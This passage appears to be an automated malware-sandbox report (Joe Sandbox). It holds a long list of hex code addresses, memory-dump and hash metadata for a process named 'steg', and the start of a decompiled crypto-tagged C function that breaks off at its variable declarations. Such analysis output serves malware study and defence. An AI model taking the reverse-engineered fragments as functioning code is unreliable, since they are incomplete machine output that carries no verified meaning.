                                                                                                                    0x00fb4f56
                                                                                                                    0x00fb4f59
                                                                                                                    0x00fb4f5e
                                                                                                                    0x00fb4f61
                                                                                                                    0x00fb4f64
                                                                                                                    0x00fb4f69
                                                                                                                    0x00fb4f6d
                                                                                                                    0x00fb4f70
                                                                                                                    0x00fb4f73
                                                                                                                    0x00fb4f76
                                                                                                                    0x00fb50b5
                                                                                                                    0x00fb50b5
                                                                                                                    0x00fb50b8
                                                                                                                    0x00fb50bc
                                                                                                                    0x00000000
                                                                                                                    0x00fb50c2
                                                                                                                    0x00fb50c8
                                                                                                                    0x00fb50cd
                                                                                                                    0x00fb50d0
                                                                                                                    0x00fb50d2
                                                                                                                    0x00000000
                                                                                                                    0x00fb50d8
                                                                                                                    0x00fb50d8
                                                                                                                    0x00fb50db
                                                                                                                    0x00fb50dd
                                                                                                                    0x00fb50df
                                                                                                                    0x00fb50e1
                                                                                                                    0x00fb50e3
                                                                                                                    0x00fb50e7
                                                                                                                    0x00fb50e7
                                                                                                                    0x00fb50e9
                                                                                                                    0x00fb50eb
                                                                                                                    0x00fb50ed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb50ef
                                                                                                                    0x00fb50f1
                                                                                                                    0x00fb50fb
                                                                                                                    0x00fb50fb
                                                                                                                    0x00fb50fc
                                                                                                                    0x00fb50ff
                                                                                                                    0x00fb5101
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb50f3
                                                                                                                    0x00fb50f6
                                                                                                                    0x00fb50f9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb50f9
                                                                                                                    0x00000000
                                                                                                                    0x00fb50f1
                                                                                                                    0x00fb5103
                                                                                                                    0x00fb5103
                                                                                                                    0x00fb5106
                                                                                                                    0x00fb5108
                                                                                                                    0x00fb588c
                                                                                                                    0x00fb510e
                                                                                                                    0x00fb510e
                                                                                                                    0x00fb5114
                                                                                                                    0x00fb5118
                                                                                                                    0x00fb511b
                                                                                                                    0x00fb511e
                                                                                                                    0x00fb5121
                                                                                                                    0x00fb5123
                                                                                                                    0x00fb5130
                                                                                                                    0x00fb5130
                                                                                                                    0x00fb5125
                                                                                                                    0x00fb5125
                                                                                                                    0x00fb512c
                                                                                                                    0x00fb512e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb512e
                                                                                                                    0x00fb5133
                                                                                                                    0x00fb5135
                                                                                                                    0x00fb5138
                                                                                                                    0x00fb513a
                                                                                                                    0x00fb5147
                                                                                                                    0x00fb514a
                                                                                                                    0x00fb514d
                                                                                                                    0x00fb514f
                                                                                                                    0x00fb5151
                                                                                                                    0x00fb5154
                                                                                                                    0x00fb51b1
                                                                                                                    0x00fb51b3
                                                                                                                    0x00fb51b6
                                                                                                                    0x00fb51b9
                                                                                                                    0x00fb51c3
                                                                                                                    0x00fb51c3
                                                                                                                    0x00fb51bb
                                                                                                                    0x00fb51be
                                                                                                                    0x00fb51be
                                                                                                                    0x00fb51c8
                                                                                                                    0x00fb51cb
                                                                                                                    0x00fb51cf
                                                                                                                    0x00fb51d2
                                                                                                                    0x00fb51d5
                                                                                                                    0x00fb51d8
                                                                                                                    0x00fb51db
                                                                                                                    0x00fb5837
                                                                                                                    0x00fb5837
                                                                                                                    0x00fb583a
                                                                                                                    0x00fb583c
                                                                                                                    0x00fb5851
                                                                                                                    0x00fb5856
                                                                                                                    0x00fb5859
                                                                                                                    0x00fb585e
                                                                                                                    0x00fb583e
                                                                                                                    0x00fb5847
                                                                                                                    0x00fb584c
                                                                                                                    0x00fb584c
                                                                                                                    0x00fb51e1
                                                                                                                    0x00fb51ea
                                                                                                                    0x00fb51ea
                                                                                                                    0x00fb51ed
                                                                                                                    0x00fb51f0
                                                                                                                    0x00fb51f3
                                                                                                                    0x00fb51f6
                                                                                                                    0x00fb51f8
                                                                                                                    0x00fb51fa
                                                                                                                    0x00fb51fd
                                                                                                                    0x00fb51fd
                                                                                                                    0x00fb5200
                                                                                                                    0x00fb5204
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb520a
                                                                                                                    0x00fb520c
                                                                                                                    0x00fb525b
                                                                                                                    0x00fb525b
                                                                                                                    0x00fb525d
                                                                                                                    0x00fb5264
                                                                                                                    0x00fb5267
                                                                                                                    0x00fb526a
                                                                                                                    0x00fb5277
                                                                                                                    0x00fb5277
                                                                                                                    0x00fb527a
                                                                                                                    0x00fb527d
                                                                                                                    0x00fb5282
                                                                                                                    0x00fb5285
                                                                                                                    0x00fb5288
                                                                                                                    0x00fb528e
                                                                                                                    0x00fb5290
                                                                                                                    0x00fb52d4
                                                                                                                    0x00fb52d4
                                                                                                                    0x00fb52d6
                                                                                                                    0x00fb52ef
                                                                                                                    0x00fb52ef
                                                                                                                    0x00fb52d8
                                                                                                                    0x00fb52d8
                                                                                                                    0x00fb52db
                                                                                                                    0x00fb52dd
                                                                                                                    0x00fb52df
                                                                                                                    0x00fb52df
                                                                                                                    0x00fb52e0
                                                                                                                    0x00fb52e0
                                                                                                                    0x00fb52df
                                                                                                                    0x00fb52e7
                                                                                                                    0x00fb52e7
                                                                                                                    0x00fb52f1
                                                                                                                    0x00fb52f5
                                                                                                                    0x00fb52f5
                                                                                                                    0x00fb52f8
                                                                                                                    0x00fb5304
                                                                                                                    0x00fb530b
                                                                                                                    0x00fb534c
                                                                                                                    0x00fb534c
                                                                                                                    0x00fb534f
                                                                                                                    0x00fb5354
                                                                                                                    0x00fb53b1
                                                                                                                    0x00fb53b1
                                                                                                                    0x00fb53b3
                                                                                                                    0x00fb53b6
                                                                                                                    0x00000000
                                                                                                                    0x00fb5356
                                                                                                                    0x00fb5356
                                                                                                                    0x00fb535d
                                                                                                                    0x00fb53a0
                                                                                                                    0x00fb53a2
                                                                                                                    0x00000000
                                                                                                                    0x00fb535f
                                                                                                                    0x00fb535f
                                                                                                                    0x00fb5364
                                                                                                                    0x00fb5366
                                                                                                                    0x00fb5369
                                                                                                                    0x00fb536f
                                                                                                                    0x00fb536f
                                                                                                                    0x00fb5377
                                                                                                                    0x00fb537c
                                                                                                                    0x00fb5381
                                                                                                                    0x00fb5384
                                                                                                                    0x00fb5386
                                                                                                                    0x00fb5394
                                                                                                                    0x00fb5388
                                                                                                                    0x00fb5389
                                                                                                                    0x00fb538f
                                                                                                                    0x00fb53a5
                                                                                                                    0x00fb53a5
                                                                                                                    0x00fb53a5
                                                                                                                    0x00fb5386
                                                                                                                    0x00fb53a8
                                                                                                                    0x00fb53ab
                                                                                                                    0x00fb53ad
                                                                                                                    0x00000000
                                                                                                                    0x00fb53af
                                                                                                                    0x00fb53b9
                                                                                                                    0x00fb53bc
                                                                                                                    0x00000000
                                                                                                                    0x00fb53bc
                                                                                                                    0x00fb53ad
                                                                                                                    0x00fb530d
                                                                                                                    0x00fb5314
                                                                                                                    0x00fb5316
                                                                                                                    0x00000000
                                                                                                                    0x00fb5318
                                                                                                                    0x00fb5318
                                                                                                                    0x00fb531e
                                                                                                                    0x00fb5321
                                                                                                                    0x00fb5323
                                                                                                                    0x00000000
                                                                                                                    0x00fb5325
                                                                                                                    0x00fb5325
                                                                                                                    0x00fb532a
                                                                                                                    0x00fb5330
                                                                                                                    0x00fb5336
                                                                                                                    0x00fb533c
                                                                                                                    0x00fb5342
                                                                                                                    0x00fb5344
                                                                                                                    0x00fb5344
                                                                                                                    0x00fb53c0
                                                                                                                    0x00fb53c0
                                                                                                                    0x00fb53c2
                                                                                                                    0x00fb53c4
                                                                                                                    0x00fb53d0
                                                                                                                    0x00fb53d4
                                                                                                                    0x00fb53d7
                                                                                                                    0x00fb53da
                                                                                                                    0x00fb53dd
                                                                                                                    0x00fb53df
                                                                                                                    0x00fb53f7
                                                                                                                    0x00fb53fb
                                                                                                                    0x00fb53fe
                                                                                                                    0x00fb5406
                                                                                                                    0x00fb5409
                                                                                                                    0x00fb53e1
                                                                                                                    0x00fb53e6
                                                                                                                    0x00fb53ea
                                                                                                                    0x00fb53ea
                                                                                                                    0x00fb540d
                                                                                                                    0x00fb540d
                                                                                                                    0x00fb53c2
                                                                                                                    0x00fb5323
                                                                                                                    0x00fb5316
                                                                                                                    0x00fb52fa
                                                                                                                    0x00fb52fa
                                                                                                                    0x00fb52fc
                                                                                                                    0x00fb52fc
                                                                                                                    0x00fb5416
                                                                                                                    0x00fb5419
                                                                                                                    0x00fb541c
                                                                                                                    0x00fb542b
                                                                                                                    0x00fb542b
                                                                                                                    0x00fb542e
                                                                                                                    0x00fb5430
                                                                                                                    0x00fb5449
                                                                                                                    0x00fb5449
                                                                                                                    0x00fb5432
                                                                                                                    0x00fb5432
                                                                                                                    0x00fb5435
                                                                                                                    0x00fb5437
                                                                                                                    0x00fb5439
                                                                                                                    0x00fb5439
                                                                                                                    0x00fb543a
                                                                                                                    0x00fb543a
                                                                                                                    0x00fb5439
                                                                                                                    0x00fb5441
                                                                                                                    0x00fb5441
                                                                                                                    0x00fb544b
                                                                                                                    0x00fb544e
                                                                                                                    0x00fb544e
                                                                                                                    0x00fb5451
                                                                                                                    0x00fb5455
                                                                                                                    0x00fb545e
                                                                                                                    0x00fb5465
                                                                                                                    0x00fb54a0
                                                                                                                    0x00fb54a0
                                                                                                                    0x00fb54a3
                                                                                                                    0x00fb54a8
                                                                                                                    0x00fb5505
                                                                                                                    0x00fb5505
                                                                                                                    0x00fb5507
                                                                                                                    0x00000000
                                                                                                                    0x00fb54aa
                                                                                                                    0x00fb54aa
                                                                                                                    0x00fb54b1
                                                                                                                    0x00fb54f4
                                                                                                                    0x00fb54f6
                                                                                                                    0x00000000
                                                                                                                    0x00fb54b3
                                                                                                                    0x00fb54b3
                                                                                                                    0x00fb54b8
                                                                                                                    0x00fb54ba
                                                                                                                    0x00fb54bd
                                                                                                                    0x00fb54c3
                                                                                                                    0x00fb54c3
                                                                                                                    0x00fb54cb
                                                                                                                    0x00fb54d0
                                                                                                                    0x00fb54d5
                                                                                                                    0x00fb54d8
                                                                                                                    0x00fb54da
                                                                                                                    0x00fb54e8
                                                                                                                    0x00fb54dc
                                                                                                                    0x00fb54dd
                                                                                                                    0x00fb54e3
                                                                                                                    0x00fb54f9
                                                                                                                    0x00fb54f9
                                                                                                                    0x00fb54f9
                                                                                                                    0x00fb54da
                                                                                                                    0x00fb54fc
                                                                                                                    0x00fb54fe
                                                                                                                    0x00000000
                                                                                                                    0x00fb5500
                                                                                                                    0x00fb5500
                                                                                                                    0x00fb550a
                                                                                                                    0x00fb550a
                                                                                                                    0x00000000
                                                                                                                    0x00fb550a
                                                                                                                    0x00fb54fe
                                                                                                                    0x00fb5467
                                                                                                                    0x00fb546e
                                                                                                                    0x00fb5470
                                                                                                                    0x00000000
                                                                                                                    0x00fb5472
                                                                                                                    0x00fb5472
                                                                                                                    0x00fb5478
                                                                                                                    0x00fb547a
                                                                                                                    0x00000000
                                                                                                                    0x00fb547c
                                                                                                                    0x00fb547e
                                                                                                                    0x00fb5484
                                                                                                                    0x00fb548a
                                                                                                                    0x00fb5490
                                                                                                                    0x00fb5496
                                                                                                                    0x00fb5498
                                                                                                                    0x00fb5498
                                                                                                                    0x00fb550e
                                                                                                                    0x00fb550e
                                                                                                                    0x00fb5510
                                                                                                                    0x00fb5512
                                                                                                                    0x00fb551e
                                                                                                                    0x00fb5522
                                                                                                                    0x00fb5525
                                                                                                                    0x00fb5528
                                                                                                                    0x00fb552b
                                                                                                                    0x00fb552d
                                                                                                                    0x00fb5545
                                                                                                                    0x00fb5549
                                                                                                                    0x00fb554c
                                                                                                                    0x00fb5554
                                                                                                                    0x00fb5557
                                                                                                                    0x00fb552f
                                                                                                                    0x00fb5534
                                                                                                                    0x00fb5538
                                                                                                                    0x00fb5538
                                                                                                                    0x00fb555b
                                                                                                                    0x00fb555b
                                                                                                                    0x00fb5510
                                                                                                                    0x00fb547a
                                                                                                                    0x00fb5470
                                                                                                                    0x00fb5457
                                                                                                                    0x00fb5457
                                                                                                                    0x00fb5457
                                                                                                                    0x00fb5565
                                                                                                                    0x00fb5567
                                                                                                                    0x00fb5569
                                                                                                                    0x00fb55bd
                                                                                                                    0x00fb55bd
                                                                                                                    0x00fb55c4
                                                                                                                    0x00fb5609
                                                                                                                    0x00fb560b
                                                                                                                    0x00000000
                                                                                                                    0x00fb55c6
                                                                                                                    0x00fb55c6
                                                                                                                    0x00fb55cb
                                                                                                                    0x00fb55cd
                                                                                                                    0x00fb55d0
                                                                                                                    0x00fb55d6
                                                                                                                    0x00fb55d6
                                                                                                                    0x00fb55df
                                                                                                                    0x00fb55e4
                                                                                                                    0x00fb55e9
                                                                                                                    0x00fb55ec
                                                                                                                    0x00fb55ee
                                                                                                                    0x00fb55fc
                                                                                                                    0x00fb55f0
                                                                                                                    0x00fb55f1
                                                                                                                    0x00fb55f7
                                                                                                                    0x00fb560e
                                                                                                                    0x00fb560e
                                                                                                                    0x00fb560e
                                                                                                                    0x00fb55ee
                                                                                                                    0x00fb5611
                                                                                                                    0x00fb5613
                                                                                                                    0x00000000
                                                                                                                    0x00fb5615
                                                                                                                    0x00fb5615
                                                                                                                    0x00fb5617
                                                                                                                    0x00fb5619
                                                                                                                    0x00fb5619
                                                                                                                    0x00000000
                                                                                                                    0x00fb5617
                                                                                                                    0x00fb556b
                                                                                                                    0x00fb556b
                                                                                                                    0x00fb556f
                                                                                                                    0x00fb5578
                                                                                                                    0x00fb557f
                                                                                                                    0x00000000
                                                                                                                    0x00fb5581
                                                                                                                    0x00fb5586
                                                                                                                    0x00fb558d
                                                                                                                    0x00000000
                                                                                                                    0x00fb558f
                                                                                                                    0x00fb558f
                                                                                                                    0x00fb5595
                                                                                                                    0x00fb5597
                                                                                                                    0x00000000
                                                                                                                    0x00fb5599
                                                                                                                    0x00fb559b
                                                                                                                    0x00fb55a1
                                                                                                                    0x00fb55a7
                                                                                                                    0x00fb55ad
                                                                                                                    0x00fb55b3
                                                                                                                    0x00fb55b5
                                                                                                                    0x00fb55b5
                                                                                                                    0x00fb561d
                                                                                                                    0x00fb561d
                                                                                                                    0x00fb561f
                                                                                                                    0x00fb5621
                                                                                                                    0x00fb5626
                                                                                                                    0x00fb562b
                                                                                                                    0x00fb562e
                                                                                                                    0x00fb562e
                                                                                                                    0x00fb5631
                                                                                                                    0x00fb5634
                                                                                                                    0x00fb5638
                                                                                                                    0x00fb5638
                                                                                                                    0x00fb561f
                                                                                                                    0x00fb5597
                                                                                                                    0x00fb558d
                                                                                                                    0x00fb5571
                                                                                                                    0x00fb5571
                                                                                                                    0x00fb5571
                                                                                                                    0x00fb556f
                                                                                                                    0x00fb5642
                                                                                                                    0x00fb5644
                                                                                                                    0x00fb5646
                                                                                                                    0x00fb56ea
                                                                                                                    0x00fb56f2
                                                                                                                    0x00fb56f4
                                                                                                                    0x00fb56f6
                                                                                                                    0x00fb56f9
                                                                                                                    0x00fb56fd
                                                                                                                    0x00fb56ff
                                                                                                                    0x00fb56ff
                                                                                                                    0x00fb56ff
                                                                                                                    0x00fb5706
                                                                                                                    0x00fb5706
                                                                                                                    0x00fb56fd
                                                                                                                    0x00fb5709
                                                                                                                    0x00fb570b
                                                                                                                    0x00fb570d
                                                                                                                    0x00fb5710
                                                                                                                    0x00fb5714
                                                                                                                    0x00fb5716
                                                                                                                    0x00fb5716
                                                                                                                    0x00fb5716
                                                                                                                    0x00fb571d
                                                                                                                    0x00fb571d
                                                                                                                    0x00fb5714
                                                                                                                    0x00fb5721
                                                                                                                    0x00000000
                                                                                                                    0x00fb564c
                                                                                                                    0x00fb564c
                                                                                                                    0x00fb564e
                                                                                                                    0x00fb5652
                                                                                                                    0x00fb565c
                                                                                                                    0x00fb565f
                                                                                                                    0x00fb5663
                                                                                                                    0x00fb5665
                                                                                                                    0x00fb5667
                                                                                                                    0x00fb568f
                                                                                                                    0x00fb5690
                                                                                                                    0x00fb5695
                                                                                                                    0x00fb5669
                                                                                                                    0x00fb5669
                                                                                                                    0x00fb566f
                                                                                                                    0x00000000
                                                                                                                    0x00fb5671
                                                                                                                    0x00fb5671
                                                                                                                    0x00fb5677
                                                                                                                    0x00000000
                                                                                                                    0x00fb5679
                                                                                                                    0x00fb567f
                                                                                                                    0x00fb5681
                                                                                                                    0x00fb5687
                                                                                                                    0x00fb5687
                                                                                                                    0x00fb5677
                                                                                                                    0x00fb566f
                                                                                                                    0x00fb5667
                                                                                                                    0x00fb5663
                                                                                                                    0x00fb5698
                                                                                                                    0x00fb569b
                                                                                                                    0x00fb569d
                                                                                                                    0x00fb56a5
                                                                                                                    0x00fb56af
                                                                                                                    0x00fb56b2
                                                                                                                    0x00fb56b6
                                                                                                                    0x00fb56b8
                                                                                                                    0x00fb56ba
                                                                                                                    0x00fb56e2
                                                                                                                    0x00fb56e3
                                                                                                                    0x00fb5726
                                                                                                                    0x00fb5726
                                                                                                                    0x00fb56bc
                                                                                                                    0x00fb56bc
                                                                                                                    0x00fb56c2
                                                                                                                    0x00000000
                                                                                                                    0x00fb56c4
                                                                                                                    0x00fb56c4
                                                                                                                    0x00fb56ca
                                                                                                                    0x00000000
                                                                                                                    0x00fb56cc
                                                                                                                    0x00fb56d2
                                                                                                                    0x00fb56d4
                                                                                                                    0x00fb56da
                                                                                                                    0x00fb56da
                                                                                                                    0x00fb56ca
                                                                                                                    0x00fb56c2
                                                                                                                    0x00fb56ba
                                                                                                                    0x00fb56b6
                                                                                                                    0x00fb569d
                                                                                                                    0x00fb5729
                                                                                                                    0x00fb572d
                                                                                                                    0x00fb572f
                                                                                                                    0x00000000
                                                                                                                    0x00fb5731
                                                                                                                    0x00fb5731
                                                                                                                    0x00fb5745
                                                                                                                    0x00fb5747
                                                                                                                    0x00fb574a
                                                                                                                    0x00fb574d
                                                                                                                    0x00fb574d
                                                                                                                    0x00fb541e
                                                                                                                    0x00fb5421
                                                                                                                    0x00fb5425
                                                                                                                    0x00fb5752
                                                                                                                    0x00fb5752
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb5425
                                                                                                                    0x00fb575d
                                                                                                                    0x00fb5762
                                                                                                                    0x00fb5765
                                                                                                                    0x00fb5767
                                                                                                                    0x00fb576a
                                                                                                                    0x00fb576c
                                                                                                                    0x00fb576e
                                                                                                                    0x00fb5770
                                                                                                                    0x00fb5773
                                                                                                                    0x00fb5777
                                                                                                                    0x00fb5777
                                                                                                                    0x00fb5778
                                                                                                                    0x00fb5778
                                                                                                                    0x00fb5777
                                                                                                                    0x00fb577f
                                                                                                                    0x00fb577f
                                                                                                                    0x00fb577f
                                                                                                                    0x00fb5785
                                                                                                                    0x00fb5787
                                                                                                                    0x00fb5791
                                                                                                                    0x00fb5794
                                                                                                                    0x00fb5796
                                                                                                                    0x00fb57a6
                                                                                                                    0x00fb57a8
                                                                                                                    0x00fb57ab
                                                                                                                    0x00fb57ad
                                                                                                                    0x00fb57b4
                                                                                                                    0x00fb57b9
                                                                                                                    0x00fb57bc
                                                                                                                    0x00fb57bc
                                                                                                                    0x00fb57ad
                                                                                                                    0x00fb57c0
                                                                                                                    0x00fb57c0
                                                                                                                    0x00fb57c3
                                                                                                                    0x00fb57c6
                                                                                                                    0x00fb57c9
                                                                                                                    0x00fb57cb
                                                                                                                    0x00fb57f3
                                                                                                                    0x00fb57f4
                                                                                                                    0x00fb57f9
                                                                                                                    0x00fb57cd
                                                                                                                    0x00fb57cd
                                                                                                                    0x00fb57d3
                                                                                                                    0x00000000
                                                                                                                    0x00fb57d5
                                                                                                                    0x00fb57d5
                                                                                                                    0x00fb57db
                                                                                                                    0x00000000
                                                                                                                    0x00fb57dd
                                                                                                                    0x00fb57e3
                                                                                                                    0x00fb57e5
                                                                                                                    0x00fb57eb
                                                                                                                    0x00fb57eb
                                                                                                                    0x00fb57db
                                                                                                                    0x00fb57d3
                                                                                                                    0x00fb5292
                                                                                                                    0x00fb5292
                                                                                                                    0x00fb5294
                                                                                                                    0x00000000
                                                                                                                    0x00fb5296
                                                                                                                    0x00fb5296
                                                                                                                    0x00fb52a0
                                                                                                                    0x00fb52a2
                                                                                                                    0x00fb52a7
                                                                                                                    0x00fb52aa
                                                                                                                    0x00fb52c0
                                                                                                                    0x00fb52c4
                                                                                                                    0x00fb52c9
                                                                                                                    0x00fb52cc
                                                                                                                    0x00fb52ce
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb52ac
                                                                                                                    0x00fb52b0
                                                                                                                    0x00fb52b5
                                                                                                                    0x00fb52b8
                                                                                                                    0x00fb52ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb52ba
                                                                                                                    0x00fb52aa
                                                                                                                    0x00fb5294
                                                                                                                    0x00fb5290
                                                                                                                    0x00fb57ff
                                                                                                                    0x00fb5802
                                                                                                                    0x00fb5805
                                                                                                                    0x00fb5808
                                                                                                                    0x00fb5809
                                                                                                                    0x00fb580c
                                                                                                                    0x00fb580c
                                                                                                                    0x00fb5815
                                                                                                                    0x00fb5815
                                                                                                                    0x00fb520e
                                                                                                                    0x00fb520e
                                                                                                                    0x00fb5213
                                                                                                                    0x00fb5215
                                                                                                                    0x00fb5217
                                                                                                                    0x00fb5219
                                                                                                                    0x00fb5219
                                                                                                                    0x00fb521c
                                                                                                                    0x00fb5225
                                                                                                                    0x00fb522b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb522d
                                                                                                                    0x00fb5230
                                                                                                                    0x00fb5231
                                                                                                                    0x00fb5232
                                                                                                                    0x00fb5234
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb5234
                                                                                                                    0x00fb5219
                                                                                                                    0x00fb5236
                                                                                                                    0x00fb5236
                                                                                                                    0x00fb5240
                                                                                                                    0x00fb5243
                                                                                                                    0x00fb524d
                                                                                                                    0x00fb524f
                                                                                                                    0x00fb5252
                                                                                                                    0x00fb5258
                                                                                                                    0x00000000
                                                                                                                    0x00fb5258
                                                                                                                    0x00fb5252
                                                                                                                    0x00fb581b
                                                                                                                    0x00fb581f
                                                                                                                    0x00fb5822
                                                                                                                    0x00fb5825
                                                                                                                    0x00fb5828
                                                                                                                    0x00fb582a
                                                                                                                    0x00fb51e7
                                                                                                                    0x00000000
                                                                                                                    0x00fb51e7
                                                                                                                    0x00000000
                                                                                                                    0x00fb582a
                                                                                                                    0x00fb5833
                                                                                                                    0x00fb5835
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb5835
                                                                                                                    0x00fb5156
                                                                                                                    0x00fb5156
                                                                                                                    0x00fb5159
                                                                                                                    0x00fb5163
                                                                                                                    0x00fb5168
                                                                                                                    0x00fb516d
                                                                                                                    0x00fb5170
                                                                                                                    0x00fb5173
                                                                                                                    0x00fb5175
                                                                                                                    0x00fb5182
                                                                                                                    0x00fb5194
                                                                                                                    0x00fb5198
                                                                                                                    0x00fb519f
                                                                                                                    0x00fb519f
                                                                                                                    0x00fb51a6
                                                                                                                    0x00fb515b
                                                                                                                    0x00fb515e
                                                                                                                    0x00fb5161
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb5161
                                                                                                                    0x00fb5159
                                                                                                                    0x00fb5867
                                                                                                                    0x00fb586a
                                                                                                                    0x00fb586b
                                                                                                                    0x00fb586d
                                                                                                                    0x00fb5870
                                                                                                                    0x00fb5870
                                                                                                                    0x00fb5147
                                                                                                                    0x00fb587d
                                                                                                                    0x00fb5882
                                                                                                                    0x00fb5885
                                                                                                                    0x00fb5888
                                                                                                                    0x00fb5888
                                                                                                                    0x00fb588f
                                                                                                                    0x00fb5891
                                                                                                                    0x00fb5893
                                                                                                                    0x00fb5897
                                                                                                                    0x00fb589a
                                                                                                                    0x00fb589c
                                                                                                                    0x00fb58a1
                                                                                                                    0x00fb58a4
                                                                                                                    0x00fb58a9
                                                                                                                    0x00fb589a
                                                                                                                    0x00fb58ae
                                                                                                                    0x00fb58b4
                                                                                                                    0x00fb58b4
                                                                                                                    0x00fb50d2
                                                                                                                    0x00fb4f7c
                                                                                                                    0x00fb4f7c
                                                                                                                    0x00fb4f7c
                                                                                                                    0x00fb4f80
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb4f86
                                                                                                                    0x00fb4f89
                                                                                                                    0x00fb4f8b
                                                                                                                    0x00fb5060
                                                                                                                    0x00fb5062
                                                                                                                    0x00fb5065
                                                                                                                    0x00fb5068
                                                                                                                    0x00fb506a
                                                                                                                    0x00000000
                                                                                                                    0x00fb5070
                                                                                                                    0x00fb5070
                                                                                                                    0x00fb5074
                                                                                                                    0x00fb5078
                                                                                                                    0x00fb5080
                                                                                                                    0x00fb5084
                                                                                                                    0x00fb5089
                                                                                                                    0x00fb508c
                                                                                                                    0x00fb508e
                                                                                                                    0x00000000
                                                                                                                    0x00fb5094
                                                                                                                    0x00fb5098
                                                                                                                    0x00fb50a5
                                                                                                                    0x00fb50a8
                                                                                                                    0x00fb50ad
                                                                                                                    0x00000000
                                                                                                                    0x00fb50ad
                                                                                                                    0x00fb507a
                                                                                                                    0x00fb507a
                                                                                                                    0x00fb507e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fb507e
                                                                                                                    0x00fb5078
                                                                                                                    0x00fb4f91
                                                                                                                    0x00fb4f91
                                                                                                                    0x00fb4f96
                                                                                                                    0x00fb4fa3
                                                                                                                    0x00fb4fa5
                                                                                                                    0x00fb4fa8
                                                                                                                    0x00fb4faa
                                                                                                                    0x00fb4fb1
                                                                                                                    0x00fb4fb6
                                                                                                                    0x00fb4fb6
                                                                                                                    0x00fb4fb9
                                                                                                                    0x00fb4fbc
                                                                                                                    0x00fb4fbe
                                                                                                                    0x00fb58b5
                                                                                                                    0x00fb58c0
                                                                                                                    0x00fb4fc4
                                                                                                                    0x00fb4fc4
                                                                                                                    0x00fb4fc9
                                                                                                                    0x00fb4fd0
                                                                                                                    0x00fb4fd3
                                                                                                                    0x00fb4fe0
                                                                                                                    0x00fb4fe9
                                                                                                                    0x00fb4fec
                                                                                                                    0x00fb4fef
                                                                                                                    0x00fb4ff2
                                                                                                                    0x00fb4ff4
                                                                                                                    0x00fb4ff7
                                                                                                                    0x00fb4ff9
                                                                                                                    0x00fb4ffc
                                                                                                                    0x00fb4ffc
                                                                                                                    0x00fb5000
                                                                                                                    0x00fb5004
                                                                                                                    0x00fb500d
                                                                                                                    0x00fb5012
                                                                                                                    0x00fb5015
                                                                                                                    0x00fb5018
                                                                                                                    0x00fb5018
                                                                                                                    0x00fb5018
                                                                                                                    0x00fb501c
                                                                                                                    0x00fb5023
                                                                                                                    0x00fb5023
                                                                                                                    0x00fb5026
                                                                                                                    0x00fb502a
                                                                                                                    0x00fb502f
                                                                                                                    0x00fb5032
                                                                                                                    0x00fb5034
                                                                                                                    0x00000000
                                                                                                                    0x00fb503a
                                                                                                                    0x00fb503d
                                                                                                                    0x00fb5041
                                                                                                                    0x00fb5044
                                                                                                                    0x00fb5047
                                                                                                                    0x00fb5049
                                                                                                                    0x00000000
                                                                                                                    0x00fb504b
                                                                                                                    0x00fb504b
                                                                                                                    0x00000000
                                                                                                                    0x00fb504b
                                                                                                                    0x00fb5049
                                                                                                                    0x00fb5034
                                                                                                                    0x00fb4fbe
                                                                                                                    0x00000000
                                                                                                                    0x00fb4f8b
                                                                                                                    0x00000000
                                                                                                                    0x00fb4f7c
                                                                                                                    0x00fb4f76
                                                                                                                    0x00fb4f45
                                                                                                                    0x00fb4f22
                                                                                                                    0x00fb4f2b
                                                                                                                    0x00fb4f2b
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2102423945-0
                                                                                                                    • Opcode ID: 50d52cfa1bfe01fcbe527e015016e1cc784ea519b6d722397e95e5f51c055020
                                                                                                                    • Instruction ID: c0569a5f4e89ca5e858779e89e69ae603e7bec3c546cfedbc282b5ef7ef77d1a
                                                                                                                    • Opcode Fuzzy Hash: 50d52cfa1bfe01fcbe527e015016e1cc784ea519b6d722397e95e5f51c055020
                                                                                                                    • Instruction Fuzzy Hash: 8062B171D00A45DFDB21DF59C881BEABBB5BF04714F284469E809AB241E739ED41EFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FBA6E7 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 517COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 61%
                                                                                                                    			E00FBA6E7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20) {
				signed int _v8;
				char _v108;
				intOrPtr _v112;
				char _v115;
				char _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				signed int _v128;
				intOrPtr* _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				intOrPtr _v164;
				char _v168;
				signed int _v172;
